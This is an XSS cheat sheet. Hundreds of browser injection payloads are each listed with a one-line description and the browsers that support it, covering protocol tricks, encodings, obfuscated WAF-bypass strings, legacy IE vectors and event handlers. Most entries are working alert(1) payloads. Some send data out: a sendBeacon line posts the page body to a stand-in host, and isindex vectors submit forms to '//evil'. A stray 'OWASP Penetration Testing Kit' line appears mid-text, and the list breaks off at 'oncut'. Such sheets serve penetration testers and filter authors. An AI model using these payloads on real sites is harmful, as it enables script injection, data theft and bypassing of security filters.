Embed src attribute with JavaScript protocol

firefox

<a href="javascript:alert(1)">XSS</a>
A standard JavaScript protocol

chrome,firefox,safari

<a href="JaVaScript:alert(1)">XSS</a>
The protocol is not case sensitive

chrome,firefox,safari

<a href=" javascript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol

chrome,firefox,safari

<a href="javas cript:alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed inside the protocol

chrome,firefox,safari

<a href="javascript :alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

chrome,firefox,safari

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
Xlink namespace inside SVG with JavaScript protocol

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using values

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to

chrome,firefox,safari

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag

chrome,firefox,safari

<script src="data:text/javascript,alert(1)"></script>
Data protocol inside script src

chrome,firefox,safari

<svg><script href="data:text/javascript,alert(1)" />
SVG script href attribute without closing script tag

firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
SVG use element Chrome/Firefox

chrome,firefox

<script>import('data:text/javascript,alert(1)')</script>
Import statement with data URL

chrome,firefox,safari

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
Base tag with JavaScript protocol rewriting relative URLS

safari

<math><x href="javascript:alert(1)">blah
MathML makes any tag clickable

firefox

<form><button formaction=javascript:alert(1)>XSS
Button and formaction

chrome,firefox,safari

<form><input type=submit formaction=javascript:alert(1) value=XSS>
Input and formaction

chrome,firefox,safari

<form action=javascript:alert(1)><input type=submit value=XSS>
Form and action

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Animate tag with keytimes and multiple values

chrome,firefox,safari

<a href="javascript://%0aalert(1)">XSS</a>
JavaScript protocol with new line

chrome,firefox,safari

<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
Data URL with use element and base64 encoded

chrome,firefox

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
Data URL with use element

chrome,firefox

<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" /><use id=x />
Animate tag with auto executing use element

chrome,firefox

<embed code=https://example.com width=500 height=500 type=text/html>
Embed supports code attribute

chrome

<object width=500 height=500 type=text/html><param name=url value=https://example.com>
Object tag supports param url

chrome

<object width=500 height=500 type=text/html><param name=code value=https://example.com>
Object tag supports param code

chrome

<object width=500 height=500 type=text/html><param name=movie value=https://example.com>
Object tag supports param movie

chrome

<object width=500 height=500 type=text/html><param name=src value=https://example.com>
Object tag supports param src

chrome

<script>location.protocol='javascript'</script>
Assignable protocol with location

chrome,safari

<a href="%0aalert(1)" onclick="protocol='javascript'">test</a>
Assignable protocol with anchor

chrome,safari

<script>navigation.navigate('javascript:alert(1)')</script>
Navigation navigate method

chrome

 
Encoding
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Overlong UTF-8

chrome,firefox,safari

<script>\u0061lert(1)</script>
Unicode escapes

chrome,firefox,safari

<script>\u{61}lert(1)</script>
Unicode escapes ES6 style

chrome,firefox,safari

<script>\u{0000000061}lert(1)</script>
Unicode escapes ES6 style zero padded

chrome,firefox,safari

<script>eval('\x61lert(1)')</script>
Hex encoding JavaScript escapes

chrome,firefox,safari

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Octal encoding

chrome,firefox,safari

<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
Decimal encoding with optional semi-colon

chrome,firefox,safari

<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
SVG script with HTML encoding

chrome,firefox,safari

<a href="&#0000106avascript:alert(1)">XSS</a>
Decimal encoding with padded zeros

chrome,firefox,safari

<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding entities

chrome,firefox,safari

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding without semi-colon provided next character is not a-f0-9

chrome,firefox,safari

<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding with padded zeros

chrome,firefox,safari

<a href="&#X6A;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive

chrome,firefox,safari

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
HTML entities

chrome,firefox,safari

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
URL encoding

chrome,firefox,safari

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
HTML entities and URL encoding

chrome,firefox,safari

 
Obfuscation
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64

chrome,firefox,safari

<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and HTML entities

chrome,firefox,safari

<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Data protocol inside script src with base64 and URL encoding

chrome,firefox,safari

<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
Iframe srcdoc HTML encoded

chrome,firefox,safari

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
Iframe JavaScript URL with HTML and URL encoding

chrome,firefox,safari

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
SVG script with unicode escapes and HTML encoding

chrome,firefox,safari

<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
Img tag with base64 encoding

chrome,firefox,safari

 
WAF bypass global objects
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (window)

chrome,firefox,safari

';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (self)

chrome,firefox,safari

';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (this)

chrome,firefox,safari

';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (top)

chrome,firefox,safari

';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (parent)

chrome,firefox,safari

';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (frames)

chrome,firefox,safari

';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (globalThis)

chrome,firefox,safari

';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (window)

chrome,firefox,safari

';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (self)

chrome,firefox,safari

';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (this)

chrome,firefox,safari

';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (top)

chrome,firefox,safari

';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (parent)

chrome,firefox,safari

';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (frames)

chrome,firefox,safari

';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (globalThis)

chrome,firefox,safari

';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (window)

chrome,firefox,safari

';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (self)

chrome,firefox,safari

';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (this)

chrome,firefox,safari

';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (top)

chrome,firefox,safari

';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (parent)

chrome,firefox,safari

';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (frames)

chrome,firefox,safari

';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (globalThis)

chrome,firefox,safari

';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)

chrome,firefox,safari

';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)

chrome,firefox,safari

';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)

chrome,firefox,safari

';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)

chrome,firefox,safari

';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)

chrome,firefox,safari

';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)

chrome,firefox,safari

';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)

chrome,firefox,safari

';window['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (window)

chrome,firefox,safari

';self['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (self)

chrome,firefox,safari

';this['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (this)

chrome,firefox,safari

';top['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (top)

chrome,firefox,safari

';parent['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (parent)

chrome,firefox,safari

';frames['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (frames)

chrome,firefox,safari

';globalThis['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (globalThis)

chrome,firefox,safari

';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (window)

chrome,firefox,safari

';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (self)

chrome,firefox,safari

';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (this)

chrome,firefox,safari

';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (top)

chrome,firefox,safari

';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (parent)

chrome,firefox,safari

';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (frames)

chrome,firefox,safari

';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (globalThis)

chrome,firefox,safari

';window[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (window)

chrome,firefox,safari

';self[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (self)

chrome,firefox,safari

';this[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (this)

chrome,firefox,safari

';top[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (top)

chrome,firefox,safari

';parent[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (parent)

chrome,firefox,safari

';frames[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (frames)

chrome,firefox,safari

';globalThis[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (globalThis)

chrome,firefox,safari

';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (window)

chrome,firefox,safari

';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (self)

chrome,firefox,safari

';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (this)

chrome,firefox,safari

';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (top)

chrome,firefox,safari

';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (parent)

chrome,firefox,safari

';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (frames)

chrome,firefox,safari

';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis)

chrome,firefox,safari

 
Classic vectors
<img src="javascript:alert(1)">
Image src with JavaScript protocol

<body background="javascript:alert(1)">
Body background with JavaScript protocol

<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Iframe data urls no longer work as modern browsers use a null origin

<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
VBScript protocol used to work in IE

<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript compact was a minimal version of JS that wasn't widely used in IE

<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
JScript.Encode allows encoded JavaScript

<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
VBScript.Encoded allows encoded VBScript

<a title="&{alert(1)}">XSS</a>
JavaScript entities used to work in Netscape Navigator

<link href="xss.js" rel=stylesheet type="text/javascript">
JavaScript stylesheets used to be supported by Netscape Navigator

<form><button name=x formaction=x><b>stealme
Button used to consume markup

<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
IE9 select elements and plaintext used to consume markup

<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
XBL Firefox only <= 2

<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
XBL also worked in FF3.5 using data urls

<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
CSS expressions <=IE7

<div style=xss=expression(alert(1))> <div style="color&#x3dred">test</div>
In quirks mode IE allowed you to use = instead of :

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Behaviors for older modes of IE

<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script> </body>
Older versions of IE supported event handlers in functions

<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
GreyMagic HTML+time exploit (no longer works even in 5 docmode)

<a href="javascript&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLS after &

firefox

<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULLs inside named entities

firefox

<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Firefox allows NULL characters inside opening comments

firefox

<svg><xss onload=alert(1)>
Safari used to allow any tag to have a onload event inside SVG

safari

<isindex type=image src="//evil?
Isindex using src attribute

<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex using submit

<isindex type=submit formaction=javascript:alert(1)>
Isindex and formaction

<isindex type=submit action=javascript:alert(1)>
Isindex and action

<svg><discard onbegin=alert(1)>
discard tag and onbegin

chrome

<svg><use href="//example.com/use_element/upload.php#x" /></svg>
Use element with an external URL

<img src=validimage.png onloadstart=alert(1)>
onloadstart event for media elements in Firefox v107 and below

firefox

<input type=image onloadend=alert(1) src=validimage.png>
onloadend event for media elements in Firefox v107 and below

firefox

 
Special tags
<meta http-equiv="refresh" content="0; url=//example.com">
Redirect to a different domain

chrome,firefox,safari

<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset attribute UTF-7

<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7

+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 1

+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 2

+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 3

+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (Has to be at the start of the document) 4

<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Upgrade insecure requests

chrome,firefox,safari

<iframe sandbox src="//example.com"></iframe>
Disable JavaScript via iframe sandbox

chrome,firefox,safari

<meta name="referrer" content="no-referrer">
Disable referer

chrome,firefox,safari

 
Other attributes
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc attribute

chrome,firefox,safari

<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Using srcdoc with entities

chrome,firefox,safari

<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Click a submit element from anywhere on the page, even outside the form

chrome,firefox,safari

<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Hidden inputs: Access key attributes can enable XSS on normally unexploitable elements

firefox

<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: Access key attributes can enable XSS on normally unexploitable elements

chrome

<a href=# download="filename.html">Test</a>
Download attribute can save a copy of the current webpage

chrome,firefox,safari

<img referrerpolicy="no-referrer" src="//example.com">
Disable referrer using referrerpolicy

chrome,firefox,safari

<a href=# onclick="window.open('http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via parameter on the window.open function

chrome,firefox,safari

<iframe name="alert(1)" src="https://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via name attribute in a <iframe> tag

chrome,firefox,safari

<base target="alert(1)"><a href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in a <base> tag

chrome,firefox,safari

<a target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via target attribute in a <a> tag

chrome,firefox,safari

<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://example.com/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via usemap attribute in a <img> tag

chrome,firefox,safari

<form action="http://example.com/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via target attribute in a <form> tag

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in a <input> tag type submit

chrome,firefox,safari

<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://example.com/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Set window.name via formtarget attribute in a <input> tag type image

chrome,firefox,safari

---
OWASP Penetration Testing Kit
 
Event handlers
onafterprint
Fires after the page is printed

<body onafterprint=alert(1)>
onafterscriptexecute
Fires after script is executed

<xss onafterscriptexecute=alert(1)><script>1</script>
onanimationcancel
Fires when a CSS animation cancels

<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="print()"></xss>
onanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
onanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
onanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
onauxclick
Fires when right clicking or using the middle button of the mouse

<input onauxclick=alert(1)>
onbeforecopy
Requires you copy a piece of text

<input onbeforecopy=alert(1) value="XSS" autofocus>
onbeforecut
Requires you cut a piece of text

<input onbeforecut=alert(1) value="XSS" autofocus>
onbeforeinput
Fires when the value of the element is about to be modified

<xss contenteditable onbeforeinput=alert(1)>test
onbeforeprint
Fires before the page is printed

<body onbeforeprint=console.log(1)>
onbeforescriptexecute
Fires before script is executed

<xss onbeforescriptexecute=alert(1)><script>1</script>
onbeforetoggle
Fires before the a popop element is toggled

<button popovertarget=x>Click me</button><xss onbeforetoggle=alert(1) popover id=x>XSS</xss>
onbeforeunload
Fires after if the url changes

<body onbeforeunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onbegin
Fires when a svg animation begins

<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
onblur
Fires when an element loses focus

<xss onblur=alert(1) id=x tabindex=1 style=display:block>test</xss><input value=clickme>
onbounce
Fires when the marquee bounces

<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay
Fires if the resource can be played

<video oncanplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncanplaythrough
Fires when enough data has been loaded to play the resource all the way through

<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onchange
Requires as change of value

<input onchange=alert(1) value=xss>
onclick
Requires a click of the element

<xss onclick="alert(1)" style=display:block>test</xss>
onclose
Fires when a dialog is closed

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu
Triggered when right clicking to show the context menu

<xss oncontextmenu="alert(1)" style=display:block>test</xss>
oncopy
Requires you copy a piece of text

<xss oncopy=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
oncuechange
Fires when subtitle changes

<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE 1 00:00:00.000 --> 00:00:05.000 <b>XSS</b> "></video>
oncut
Requires you cut a piece of text

